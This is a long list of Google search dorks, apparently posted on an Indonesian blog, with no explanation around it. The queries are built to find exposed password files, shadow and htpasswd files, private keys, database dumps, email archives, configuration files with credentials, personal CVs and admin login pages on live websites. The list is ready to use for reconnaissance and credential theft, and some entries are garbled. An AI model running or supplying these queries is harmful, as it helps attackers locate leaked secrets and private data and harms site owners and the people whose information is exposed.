intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this script not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages


intitle:"D ocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
extBF DBF
extCA DCA
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx


filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"******* Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"Powered by RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs

intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps

phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!

"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"powered by dudownload" -site:duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
"Powered by DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa


filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
" -sample -cvs -example
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 quot;
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow

intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica

"inde x of" / lck
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
bash_history files
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
index.of perform.ini
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
inurl:php inurl:hlstats intext:"Server Username"
OWA Public folders & Address book
sh_history file

Mau Full file grup T.I Snipe





MKRdezign

Formulir Kontak

Nama

Email *

Pesan *

Diberdayakan oleh Blogger.
Javascript DisablePlease Enable Javascript To See All Widget